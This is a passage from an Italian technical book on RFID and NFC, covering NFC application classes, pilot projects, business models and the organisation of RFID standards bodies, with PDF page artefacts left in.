- Sony Felica (su base ISO 18092).• Selezione delle applicazioni:viene operata in modo automatico (senza intervento dell’utente) puòessere realizata in due modalità:- Explicit Selection (raccomandata), attuata tramite comandiinviati dal reader alla carta.Le informazioni per decidere i comandi sono desunte dalsegnale a radiofrequenza o dal contesto delle procedure di ini-zializazione.

- Implicit Selection, attuata direttamenta dalla carta tramite lemedesime informazioni.

• Problemi di privacy nella trasmissione RF:Per evitare questi problemi è raccomandata la generazione pseudoca-suale degli identificativi delle carte. Gli identificativi sono chiamati:- UID nel contesto ISO 14443A;- PUPI nel contesto ISO 14443B.

• Commutazione automatica della modalità di funzionamento tra leprincipali classi di applicazioni (cfr.§V.5.3):- Reader;- Card Emulator;- Peer-to-Peer (P2P).

• Per realizzare la commutazione si raccomanda che l’apparato “mobile NFC” alterni cicli di funzionamento in “Pool Sequence”(come initiator in riferimento alla fig. Figura V.17) a cicli in “ListenSequence”. Si racomanda inoltre che l’utente possa intervenire conuna selezione manuale della modalità di funzionamento, in questocaso l’apparato “mobile NFC” dovrebbe operare in modalità“Listen Sequence” (come target in riferimento alla fig. Figura V.17).

• Attivazione dell’apparato “mobile NFC”; viene raccomandata un’at-tivazione/disattivazione manuale del modulo NFC da parte dell’u-tente e la conseguente segnalazione visiva.

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 267

Page 257: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva268

5.2.4 Mobile Payment Forum

L’utilizzo della tecnologia NFC quale soluzione per effettuare pagamentisicuri tramite il telefono cellulare, è proposto anche da un’altra associazio-ne non-profit internazionale che comprende industrie appartenenti almondo “mobile” e della finanza: il Mobile Payment Forum[www.mobilepaymentforum.org]. L’associazione, nata nel novembre2001 per iniziativa di American Express, JCB Co., Ltd., MasterCardInternational e Visa International, ha l’obiettivo di sviluppare un ambien-te aperto nel quale i membri dell’organizzazione (produttori di hardware,operatori telefonici, service providers, sviluppatori di software, ecc.) col-laborano per chiarire le opportunità presenti nel settore dei mobile pay-ments, cercando soluzioni che siano allo stesso tempo convenienti, sem-plici e interoperabili.

APPLICAZIONI

È difficile fornire un quadro completo delle applicazioni NFC, questiinfatti, forniscono essenzialmente un’interfaccia con funzioni di smart-card, Reader e TAG integrati in un unico apparato, le cui applicazionisono molteplici. Comunque si prevede che l’impatto maggiore della tec-nologia NFC si avrà nell’utilizzo con il cellulare e gli altri dispositivi mobi-li non solo per i pagamenti, ma anche per accedere ai mezzi di trasporto,ai cinema, agli stadi e ai teatri. Ad esempio basterà avvicinare il telefoni-no ad uno dei totem posti nei luoghi pubblici (uffici postali, banche, ospe-dali, etc.) e interagire per ottenere le informazioni ed i servizi desiderati,utilizzando il proprio cellulare anche come una carta di credito per effet-tuare pagamenti tramite i POS (Point Of Sale) abilitati NFC.Nel seguito vengono introdotti tre esempi di classi di applicazioni tra

le più significative [51]. Va tenuto presente che, nelle applicazioni di tic-keting e pagamenti, parti consistenti sono devolute all’interfacciamentosia con l’apparato che ospita l’interfaccia utente (PDA, Telefonino, ecc.),sia con i sistemi usati come portafoglio (Secure Chip (SC) o SIM per tele-fonia mobile) che fanno riferiemnto alle carte di credito (o debito) o alcredito telefonico.

V.5.3

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 268

Page 258: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ269

5.3.1 Informazioni su oggetti (Reader mode)

Questa classe di applicazioni nasce dal bisogno di trasferire informazionidagli oggetti alle persone e copre tutte le applicazioni che usano gli NFCper ottenere informazioni (token) da apparati con comportamento passi-vo (passive token) e senza contatto fisico (contactless token). Questeapplicazioni vengono anche chiamate NFC-Advertising o read/writemode nella terminologia NFC Forum. Gli apparati coinvolti, oltre all’on-nipresente telefonino NFC, possono essere una contactless Smart Card ouna una etichetta RFID, associati a qualche oggetto fisico visibile dall’u-

tente e che ne richiami l’attenzione, esortandoload avvicinare il telefonino per leggere le informa-zioni disponibili.In altri termini, le caratteristiche della classe di

applicazioni “Reader mode” possono essere rias-sunte come “Accesso, in mobilità, ad informazio-ni locali”:- Il cellulare legge il contenuto di uno “smartposter”.- Su scatole, scaffali, prodoti, totem, manifesti,ecc.- Per Informazioni real-time cliente –>fornitore.

- Pubblicità innovative e effettiva (Target-oriented).- Profilazione dell’utente.L’impiego primario potrebbe essere l’immagazzinamento di dati (smart

poster) che possano essere letti da un NFC, con comportamento attivo,associato ad un terminale portatile (segnatamente un telefonino, maanche un PC) in possesso dell’utente.Esempio di questi dati potrebbe essere il codice EPC (Electronic

Product Code) o altri simili, ricavati dall’utente leggendo un TAG asso-ciato ad un prodotto con il proprio terminale portatile ed usato come unasorta di URL per connettersi in rete e ricavare dettagliate informazioni sulprodotto medesimo (le informazioni comparirebbero quindi sul telefoni-no, semplicemente avvicinandolo ai prodotti da esaminare).I contenuti trasferiti (da semplici dati come un numero di telefono o un

Figura V.21Esempi di applicazioni di tipo “Reader mode”

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 269

Page 259: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva270

indirizzo e-mail, fino a file di grandi dimensioni come foto e musica)dipendono dal tipo di apparato e dal modello di servizio. L’NFC inReader mode può gestire anche file multimediali di grandi dimensioni.Ciò avviene attraverso uno smart poster che invii un URL (su Internet) achiunque gli si avvicini. Attraverso l’ URL e la connessione ad Internettramite rete mobile o Wireless LAN, l’utente potrà scaricare qualsivogliacontenuto. La tecnica è illustrata in Figura V.22.Un altro esempio potrebbe essere il reperimento di informazioni neces-

sarie alla configurazione di accesso ad una rete WiFi che potrebbe essereautomaticamente attivata con la semplice introduzione nel PC di unachiave USB o una smart card dotati di interfaccia NFC.NFC può anche essere usato per trasferire DRM (diritti digitali) garan-

tendo l’accesso a contenuti protetti. In altri termini un utente può acqui-stare i diritti di una canzone o di un video che vede pubblicizzati in uno“smart poster” e fruirli sul telefonino stesso o a casa trasferendo ancora idiritti al televisore o all’impianto audio con un’applicazione NFC del tipoDevice Pairing (cfr. §V.5.3.3)

5.3.2 Ticketing / Micro Pagamenti (Carta Contactless)

In queste classi di applicazioni, gli NFC vengono usati nel trasferimentodi informazioni di valore economico.Ciò significa che i dati del biglietto o dei micro-pagamenti devono

essere immagazzinati in apparati dotati di idonee misure di sicurezza. Ilpagamento vero e proprio prevede una transazione finanziaria tra l’orga-nizzazione che accetta il pagamento o emette il biglietto ed il “portafo-glio” dell’utente (a sua volta gestito da un’organizzazione). I portafoglicomunemente usati sono le ordinarie carte di credito o le SIM di telefo-nia mobile.In altri termini, le caratteristiche della classe di applicazioni

“Emulazione carta contactless” possono essere riassunte come segue:Cellulare = carta di debito/credito (Touch’n’PAy):

- Pagamenti POS & Carta di Credito- Micro-pagamenti (borsellino elettronico)- Distributtori automatici

Figura V.22Schema di principio della tecnica per

realizzare gli “smart poster”

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 270

Page 260: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ271

- Bigliettazione elettronicaCellulare = carta Loyalty:

- Carta fedeltà- Carta punti- Airmiles

Cellulare = chiave elettronica:- Badge per accesso

- Chiave per serrature elettroniche- Immobilizer per autoIl paradigma di funzionamento prevede che l’utente sia in possesso di

un apparato portatile (terminale d’utente) che supporti sia l’NFC, sia lacomunicazione con l’organizzazione che gestisce il portafoglio. Il termina-le può essere un telefono mobile (prevalentemente), un PDA o anche unasorta di contactless Smart Card.Quando l’utente vuole effettuare un pagamento o comprare un bigliet-

to (il raggio d’azione degli NFC è di pochi cm), presenta il suo terminaled’utente davanti ad un terminale di pagamento (obliteratrice di biglietti,parchimetro, ec.), la connessione avviene automaticamente, poiché i chipNFC integrati nei due dispositivi sono in grado di generare immediata-mente una rete peer-to-peer senza fili sfruttando l'accoppiamento indut-

Figura V.23Esempi di applicazioni di tipo “emulazione

carta contactless”

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 271

Page 261: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva272

tivo, si innesca quindi un dialogo tra gli NFC dell’apparato d’utente e delterminale di pagamento che porta all’elaborazioe delle informazioni eall’autorizzazione della transazione finanziaria.In questa classe di applicazioni va gestito un vero protocollo di comu-

nicazione con il terminale di pagamento, non essendo sufficiente una sem-plice operazione di lettura (nello stile RFID).Come detto in precedenza, l’apparato d’utente ha spesso una seconda

interfaccia che viene usata per la transazione finanziaria tra il portafogliodell’utente e l’organizzazione che incassa il denaro o vende il biglietto.Questa seconda interfaccia è, ad esempio, collegata con il terminale ditelefonia mobile. Il biglietto può quindi essere effettivamente acquistatoattraverso un collegamento che usi la rete mobile. Il ruolo dell’NFC, per-tanto, non è quello di eseguire la transazione finanziaria, ma quello diindividuare e mettere in comunicazione le parti (il particolare utente conil particolare terminale di pagamento) e fornire i dati per sostituire le pro-cedure che negoziante ed utente dovrebbero compiere nell’uso di unacarta di credito.La sequenza tipica di operazioni è la seguente:

1. L’utente vuole pagare col telefonino2. L’utente seleziona l’applicazione finanziaria e avvicina lo smartphone alPOS-NFC

3. L’NFC del telefonino viene riconosciuto dal terminale POS - NFC4. L’applicazione finanziaria chiede il PIN5. L’utente digita il PIN6. Dal POS-NFC possono venir scaricate sul telefonino publicità e pro-mozioni

7. Il POS-NFC richiede autorizzazione al circuito finanziario8. Il Circuito finanziario conferma autorizzazione al POS-NFC9. Il Circuito finanziario conferma la transazone al telefonino eventual-mente con publicità e promozioniPer questo nelle applicazioni di bigliettazione, particolare attenzione

va rivolta alla compatibilità dell’ecosistema NFC con un infrastrutturache in molte realtà è esistente e consolidata. Si tratta dell’“AutomatedFare Collection System –AFC” (raccolta automatica delle tariffe). Con

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 272

Page 262: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ273

questo termine si indica un sistema distribuito per la bigliettazione inte-grata dei servizi di trasporto urbano (metropolitana, ferrovia e bus) contitoli di viaggio magnetici, cartacei o di tipo contactless.La classe di applicazioni “Emulazione carta contactless” viene spesso

chiamata “Secure NFC”. Tuttavia questo non si riferisce al fatto chel’NFC sia dotato di procedure di sicurezza, il nome infatti designa l’usocombinato di un NFC e di un sistema (sicuro) per transazioni finanziarie.Tra le principali applicazioni di ticketing si ricordano:

- In Germania, nella città di Hanau, vicino a Francoforte, dove è stataeffettuata una sperimentazione per offrire ai cittadini dotati di un tele-fonino Nokia 3220 con NFC, servizi di biglietteria sui sistemi di tra-sporto pubblico.

- Nei Paesi Bassi, a Limburg, le tessere di abbonamento alle partite dicalcio sono state sostituite con telefoni NFC, che vengono utilizzati perentrare allo stadio, comprare cibo e bevande, acquistare souvenir neipunti vendita delle squadre.

- In Francia, a Caen, gli abitanti utilizzano il telefono per pagare i loroacquisti e il parcheggio, per ottenere informazioni turistiche, scaricaresuonerie e orari degli autobus dagli Smart Poster.

Figura V.24Esempi di applicazioni di tipo “emulazione

carta contactless”

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 273

Page 263: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva274

- Negli Stati Uniti, ad Atlanta, nella Philips Arena, la tecnologia NFCconsente di entrare allo stadio avvicinando i propri telefoni NFC aigate d’ingresso; si possono anche effettuare acquisti nei chioschi auto-rizzati e nei negozi di abbigliamento.

5.3.3 Accoppiamento di apparati (Device Pairing)

Un’altra classe di applicazioni ha per scopo quello di assicurare la com-patibilità fra i sistemi wireless, e la creazione di ambienti interoperabilisenza fili.Grazie alle funzionalità dell’NFC per l’autenticazione sicura e rapida

tra dispositivi, possono essere superati problemi che finora hanno pre-cluso l’utilizzo della comunicazione wireless agli utenti aventi poca dime-stichezza con la tecnologia.L’NFC, infatti, non richiede i diversi passaggi di abilitazione del dispo-

sitivo che potrebbero risultare scoraggianti per gli utenti in alcuni contesti.Lo scambio di informazioni fra dispositivi, tramite il contatto, o l’avvicina-mento a una distanza di pochi centimetri, genera la configurazione di unarete peer-to-peer. Successivamente i dispositivi possono comunicare adistanze molto maggiori con protocolli più veloci quali Wi-Fi, Bluetooth oWibree, data la minore capacità dell’NFC rispetto a questi.Con questo tipo di tecnologia sono gli oggetti a dialogare fra di loro,

scambiandosi contenuti.In applicazioni di tipo “Device Pairing” comunicano due apparati NFC

associati a due dispositivi (ad esempio PC e macchina fotografica, o PC edaccess point WiFi), entrambi con proprie funzioni ed autonomia operativa.Il ruolo degli NFC, associati agli apparati, potrebbe essere quello di

semplificare la fase di set-up della connessione, accostando i due appara-ti e facendo eseguire una procedura sugli NFC, che semplifichi la navi-gazione nella lista di menù per le configurazioni di comunicazione.Il vantaggio consisterebbe nella non necessità di inserire parametri di

connessione, come avviene invece per altre tecnologie wireless come ilBluetooth o il Wi-fi e ciò facilita l’adozione dell’NFC anche da partedegli utenti che non vogliono confrontarsi con menù complessi per l’im-postazione dei parametri.

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 274

Page 264: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ275

In altri termini, le caratteristiche della classedi applicazioni “NFC Pairing” possono essereriassunte come segue:- Condivisione/transfer content (es. biglietti davisita elettronici)

- Configurazione automatica di dispositiviBluetooth/WiFi

- Sincronizzazione calendario, agenda, rubrichedi telefoni cellulari

- Condivisione di file tra apparati- Transferimento da un apparato all’altro diDRM (digital rights Management) divideo/musica

- Chiave elettronica per auto (immobilizer) Hands-free automatica den-tro all’abitacolo, con aggiustamento posizione sedili o profilo musicale

5.3.4 Il progetto europeo StoLPaN

Anche la Comunità Europea si sta muovendo per sostenere la tecnologiaNFC attraverso il finanziamento di un progetto di ricerca all’interno delSesto Programma Quadro: il progetto StoLPaN [www.stolpan.com](Store Logistics and Payment with NFC). L’obiettivo è quello di creare un“ecosistema NFC” nel quale siano integrati dispositivi mobili come i tele-foni cellulari, carrelli intelligenti per l’acquisto dei prodotti nei punti ven-dita, strutture di “back-office” per la gestione sicura delle transazioni.Il progetto, partito nel novembre 2006, vede la partecipazione di nume-

rose aziende tra cui SafePay, Motorola, NXP (ex Philips Semiconductors).Due i partner italiani del progetto: il Consorzio Triveneto, azienda diPadova che si occupa di curare, per conto delle banche aderenti, la proget-tazione, l'erogazione e l'evoluzione dei servizi all'utenza e il CATTID, cen-tro di ricerca dell’Università “Sapienza” di Roma.In estrema sintesi la “Mission” di Stolpan è:

- Studiare e sviluppare un ambiente multi-applicazione per NFC.- ncrementare il valore aggiunto di contenuti e servizi attraverso le pos-sibilità di un telefonino NFC. Il tutto con particolare riguardo all’in-

Figura V.25Esempi di applicazioni di tipo “NFC pairing”

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 275

Page 265: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva276

terfaccia uomo macchina, all’OTA ed ai “Secure Element”.- Contribuire alla costruzione dell’ecosistema NFC, in particolare perquanto concerne gli aspetti tecnici, quelli di business, le questionilegali, quelle di sicurezza e la normativa.

5.3.5 Principali progetti applicativi

Sulle applicazioni NFC stati realizzati numerosi progetti pilota intrapre-si in diversi Paesi.Nell’elenco che segue si indicano, località, principali applicazioni e

sito Internet.- Hanau (Frankfurt) – GermanyTicketing for Public Transport [April 2005 – Nov. 2005]Notizie dell’iniziativa, in tedesco, sono reperibili all’indirizzo:http://www.rmvplus.de/getin/FlyerHandyTicketing.pdf. Un link ininglese è il seguente:http://www.nxp.com/news/content/file_1103.html

- Limburg (Roda Stadium) – NetherlandTicketing, Payment [Aug. 2005 – May 2006]

- Caen – FrancePayment, Parking, Tourist Info, Public Transport Schedule Info,Poster Download [Oct. 2005 – May 2006][http://www.caen-ville-nfc.com/]

- Atlanta (Philips Arena) – North AmericaPayment, Poster Download [Dec. 2005 – June 2006][http://www.nokia-americaspress.com/nfc/NFC_trial_Atlanta_release_Final_12-12-05.pdf]

- Paris (Metro Systems) – France“Navigo” Travel SmartCards in the Underway [Nov. 2005–June 2006]

- Singapore (Visa International-Maybank) – MalaysiaMobile Visa Wave Payment [Launched at the end of April 2006]

- Seoul (SKTelecom) - South KoreaTicketing, Poster Download, Access Control [Start: June 2006][http://www.nxp.com/news/content/file_1237.html]

- Xiamen (China Mobile’s Xiamen Office) – China

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 276

Page 266: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ277

Ticketing, Payment [Start: July 2006][http://www.china.phi l ips .com/about/news/press/art ic le-15315.html]

- Manchester (Manchester City Stadium) – UKTicketing, Payment [Start: August 2006] ;[http://www.cardtechnology.com/article.html?id=200608306K5P5YCW]

- Amsterdam (coop. JCB-CCV Holland B.V.) – NetherlandPayment Ticketing, Payment [Start: September 2006]

- Shanghai (download of loyalty applications OTA) – ChinaUsers can download the applications over the mobile network to asecure chip embedded in the phones [Launched: August 2006]

- New York (MasterCard’s OTA m-Payments) – USASecure personalisation payment solution for Mobile phone-based pay-ments [Start: January2003]

- Strasbourg (French Bank Crédit Mutuel-CIC) – FranceNFCPayment Trial with aMVNOusing SWPprotocol) [Start: Fall 2006]

- Parigi (Paris Métro Operator RATP) – FranceTicketing Trial between Paris Métro Operator RATP and Bouygues mobi-le telco using SWP protocol) [Start: Fall 2006]–[http://www.insidecontactless.com/press/dn.php?board=tb_press&sq=9]

- Malesia e sud-est asiatico – acquisti in negozi[http://www.visa-asia.com/ap/sea/cardholders/cardsservices/visa_wave_mobile.shtml]

- Sylt: Tourist Info [Start: Sept. 2006]- Taiwan: Public Transport- Seattle: Philadelphia&Detroit Stadium (Smart Sys. Tech.)- Hagenberg Austria: Campus of the Univ. of Applied Sciences)- New York: MasterCard, MTA, Citigroup trial NYC Subway “Tap &Go”

MODELLI DI BUSINESS & PREVISIONI DI MERCATO

Per quanto concerne i modelli di business, occorre innanzitutto individua-re gli attori implicati nella catena del valore: tra questi possiamo citare iproduttori di telefonia mobile e di microcontrollori, gli operatori di rete, le

V.5.3

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 277

Page 267: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva278

banche e i produttori di carte di credito, i negozianti e coloro che svilup-pano le applicazioni. Tutti questi attori interagiscono tra loro cercandosoluzioni che siano vantaggiose ed in ciò le questioni maggiormente rile-vanti riguardano il controllo dei download delle applicazioni per il paga-mento sul telefonino e il luogo, all’interno del cellulare, in cui queste appli-cazioni dovranno risiedere. L’idea degli operatori di telefonia è quella digenerare entrate facendo pagare alle banche una commissione per poterusufruire delle loro reti per il download delle applicazioni e per poter uti-lizzare uno spazio sulla SIM Card per custodire in maniera sicura le appli-cazioni stesse. In questo modo gli operatori di telefonia potrebbero man-tenere il controllo del consumatore. Le banche, invece, preferirebbero affi-dare il controllo delle applicazioni a terze parti indipendenti che godanodell’approvazione sia delle banche stesse che degli operatori mobili.Due indagini condotte rispettivamente dalla rivista Mobile Payment

World in collaborazione con Edgar, Dunn & Company nei primi mesi del2006 e da IN-CLUB.EDC nel settembre dello stesso anno [http://www.in-club.fr/display/IC/Press+Room], hanno evidenziato come la maggiorparte degli intervistati (poco meno del 50% del campione) ritenesse che larelazione tra banche ed operatori di telefonia mobile in merito ai pagamen-ti effettuati tramite telefono cellulare fosse conflittuale piuttosto che

cooperativa. Il 37% del campione riteneva inoltreche la forma di collaborazione più efficace consi-stesse nell’affidare la gestione del processo a terzeparti affidabili ed indipendenti sia dagli operatoriche dalle banche, ma che allo stesso tempo godes-sero dell’appoggio di entrambe.La presenza di numerosi progetti pilota in

Europa, Asia a Stati Uniti dimostra l’interesse chela tecnologia NFC sta suscitando in tutti i paesitecnologicamente più avanzati. Le prime imple-

mentazioni a livello commerciale sono partite nel 2006 ad Hanau e Sylt(Germania). Gli analisti di ABI Research prevedono che la vera esplosio-ne di questa tecnologia avverrà nei prossimi 3-4 anni (vedi tabella V.3),quando la penetrazione di dispositivi NFC nel mercato supererà il 50%.

Tabella V.3La penetrazione dell'NFC nel mercato. Fonte:

ABI Research

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 278

Page 268: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

TECNOLOGIE WIRELESS A CONFRONTO

La tabella seguente mostra una comparazione tra diversi sistemi wireless,per illustrare quale sia il più adatto ai futuri sistemi RFID attivi con capa-cità di gestire in rete paradigmi di comunicazione complessi.

PARTE V - ULTERIORI TECNOLOGIE DI PROSSIMITÀ279

V.6

Tabella V.4Comparazione tra sistemi wireless

2-parteV.qxp:RFID 5-09-2008 10:59 Pagina 279

Page 269: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFIDFondamenti di una tecnologia silenziosamente pervasiva

PARTE VI

STANDARD E PROTOCOLLIDI COMUNICAZIONE

di Paolo Talone, Giuseppe RussoFondazione Ugo Bordoni

Questa parte è dedicata agli standard di comunicazione, problema di fondamentaleimportanza per la tecnologia RFID, come per tutte le applicazioni che richiedonointeroperabilità tra entità diverse ed intercambiabilità tra apparati di differenticostruttori.L’articolazione della Parte VI è la seguente: Vengono introdotte dapprima le problematiche internazionali, con particolare

attenzione alle diverse condizioni operative nei consorzi privati (EPCglobal) enegli enti pubblici di normativa (ISO), fornendo anche un quadro internazionaledegli enti ed associazioni collegate

Successivamente viene illustrata la normativa prodotta dai due grandi enti ISOed EPCglobal, con particolare interesse per i nuovi TAG RFID passivi“Generation2”, i maggiori candidati all’applicazione massiva sui singoli oggetti(corrispondente alla produzione di centinaia di miliardi di TAG da parte dell’in-dustria)

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 281

Page 270: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 282

Page 271: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE283

NORMATIVA PER LE INTERFACCE DI COMUNICAZIONESi è visto (cfr.§I.2) che la standardizzazione che regola il dialogo tra TAGe Reader vede come protagonisti essenzialmente due temi: la gestionedello spettro radio (frequenze e potenze) e le interfacce di comunicazio-ne. Questo capitolo è dedicato a quest’ultimo tema, ovvero i protocolli dicomunicazione per l’interfaccia radio e le prestazioni dei TAG in terminidi memoria e capacità di elaborazione.

LA STANDARDIZZAZIONE DELLE INTERFACCE DI COMUNICAZIONE

La tecnologia RFID è stata ed è oggetto di consistenti attività di norma-zione sia a livello pubblico (internazionale e regionale), sia privato (con-sorzi di aziende).Nei primi anni di vita la standardizzazione non è stata un processo

ordinato. La storia degli standard RFID negli ultimi 10 anni, infatti, nonha seguito uno sviluppo ideale, venendo governata da particolari interes-si industriali.Questo anche perché le opinioni sulla necessità di standard unici e

pubblici non sono unanimi. Per la maggior parte degli esperti la prolife-razione di specifiche di consorzi privati, i cosiddetti “standard de facto”,comporta incrementi nei costi sia per lo sviluppo tecnologico sia per i pro-dotti finali e comporta, inoltre, una significativa barriera al commercio.Da un altro punto di vista, però, una “libera” competizione (che quindiveda la competizione di specifiche tecniche di consorzi privati senza gran-de necessità di standard ufficiali emessi dalle organizzazioni di normati-va), potrebbe essere vista come uno stimolo a sviluppare tecnologie anta-goniste il cui successo sarebbe garantito dalle prestazioni e dal mercatoinvece che da accordi all’interno delle commissioni.La linea che si sta affermando vede prevalere gli standard “pubblici”,

solo però per quanto riguarda la razionalizzazione del processo produtti-vo dei TAG e le conseguenti economie di scala. L’azione dei produttorinegli organismi di normativa è infatti tale da far strutturare gli standardcon una quantità di opzioni spesso ingiustificata sul piano dell’utilizzo.Questo non ostacola la razionalizzazione dei processi produttivi, ma

VI.1

VI.1.1

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 283

Page 272: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva284

rende troppo agevole differenziare i prodotti in modo da rendere ardua lacosa che maggiormente interessa l’utilizzatore, ovvero l’intercambiabilitàtra fornitori. Si potrebbe quindi concludere che l’affermazione degli stan-dard “pubblici”, oggi prodotti dalle organizzazioni internazionali di nor-mativa, va vista come un processo decisamente positivo, ma le contingen-ze nelle quali si consolida tutelano meglio gli interessi dei produttori,rispetto a quelli degli utilizzatori.

APPLICAZIONI OPEN LOOP VS. CLOSED LOOP

Le prime applicazioni, standardizzate tra il 1996 ed il 2001, sono quelleche riguardano il cosiddetto “closed loop”, ovvero i contesti in cui ilmedesimo TAG viene riusato per vari oggetti o, in logistica, nel caso dicontenitori, in cui il TAG sia riusabile per contenuti differenti.Gli esempi più celebri di applicazioni closed loop sono le carte senza

contatto, per pagamenti e per controllo accessi, ma anche i TAG perlavanderia e quelli, già citati, per contenitori riusabili.Queste applicazioni vedono, di recente, anche l’impiego dei più costo-

si TAG attivi accanto ai consueti TAG passivi, per i quali, nelle applica-zioni più recenti, la riscrivibilità diventa una caratteristica importante.Per le applicazioni “closed loop” ISO ha sviluppato le famiglie di stan-

dard per carte senza contatto (cfr. §IX.4.4) e per l’identificazione deglianimali (cfr.§IX.4.3) otre a quelle per contenitori riusabili.Il cosiddetto “open loop”, invece, è il contesto di quelle applicazioni

nelle quali il TAG segue l’intera vita dell’oggetto al quale è associato.Queste applicazioni impiegano essenzialmente TAG passivi a basso costo.Le applicazioni cosiddette “open loop” riguardano l’uso degli RFID

sui singoli oggetti nel commercio, ma anche gli RFID in contenitori “aperdere” (casse, imballaggi, pallet) e riusabili, quali i “container”, se dopoogni viaggio, il TAG viene sostituito.Queste applicazioni sono relativamente più recenti, tra il 2003 ed i

giorni nostri, e coincidono con la nascita e l’operatività di EPCglobal (edel suo predecessore Auto-ID Center) (cfr.§IX.4.1).Anche ISO sta sviluppando standard per applicazioni “open loop”,

VI.1.2

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 284

Page 273: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE VI - STANDARD E PROTOCOLLI DI COMUNICAZIONE285

dalla gestione logistica di container, di pallet, di contenitori da trasporto,a quella dei singoli oggetti (incorporando gli standard EPCglobal).La progressiva riduzione dei costi dei TAG passivi sta rapidamente

conducendo quest’ultimi dalle applicazioni “closed loop”, per le qualisono nati, verso nuove applicazioni “open loop” in cui il TAG viene asso-ciato non al contenitore riusabile, bensì al singolo oggetto, seguendolo pertutta la sua vita e spesso sopravvivendogli. Per questo tipo di applicazio-ni è previsto il maggior sviluppo in un prossimo futuro.

GLI ENTI DI NORMAZIONE

Organizzazioni pubbliche e consorzi di aziende hanno portato avanti, inquesti anni, l’attività di normazione sui sistemi RFID; tra questi emergo-no essenzialmente EPCglobal ed ISO.- EPCglobal nato ed operante come una associazione privata (cfr.§IX.2);- ISO (ed organismi ad esso collegati) che costituisce l’ente mondiale dinormativa in quasi tutti i campi della tecnologia.Iniziato con specifiche esclusivamente proprietarie, il processo di stan-

dardizzazione vede ora la competizione tra i due organismi i cui elabora-ti stanno convergendo.Ad esempio, gli standard per l’interfaccia radio sono, ad oggi, proposti

sia da ISO che da EPCglobal (probabilmente l’uno orientato su tutti icampi inerenti la gestione degli oggetti, l’altro polarizzato sulle esigenzespecifiche della catena di distribuzione).A questo proposito andrebbe sottolineata l’esistenza di punti di vista

differenti relativamente all’approccio normativo di EPCglobal sui temidella proprietà intellettuale.Il processo di armonizzazione della normativa comunque è in corso e

porterà ad una famiglia di standard globali, che garantirà adozione uni-versale. Questo sarà un fattore chiave per la definitiva affermazione dellatecnologia RFID. Nel seguito si accenna al quadro dell’articolazione, nellevarie regioni, delle organizzazioni che fanno capo all’ISO.

VI.1.3

2-parteVI.qxp:rfid 5-09-2008 10:59 Pagina 285

Page 274: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva286

1.3.1 Situazione in Europa

La normativa ISO viene recepita, a livello europeo, dal Comitato Europeodi Standardizzazione (CEN), per quanto riguarda la parte fisica (hardwa-re) e procedurale (protocolli di comunicazione), mentre l’Istituto Europeodi Standardizzazione nelle Telecomunicazioni (ETSI) emette normativanelle materie omonime (essenzialmente compatibilità elettromagnetica).

1.3.2 Situazione in USA

L’ANSI (American National Standard Institute) costituisce negli USA l’e-quivalente del CEN europeo. Il NIST (National Institute of Standardsand Technology), invece, è una agenzia del Dipartimento del CommercioAmericano che emette standard obbligatori per gli acquisti fatti dal gover-no degli USA escluso il DoD (Dipartimento della Difesa) che ha standardpropri.

1.3.3 Situazione in Cina

Anche in Cina esiste l’organismo che recepisce gli standard ISO, ovveroil Dipartimento per la Standardizzazione della Cina SAC (StandardizationAdministration of the People's Republic of China) che agisce su autoriz-zazione governativa (State Council) e sotto il controllo dell’AQSIQ(General Administration of Quality Supervision, Inspection andQuarantine of the People's Republic of China).La Cina, che si avvia a costituire uno dei maggiori mercati mondiali, sta

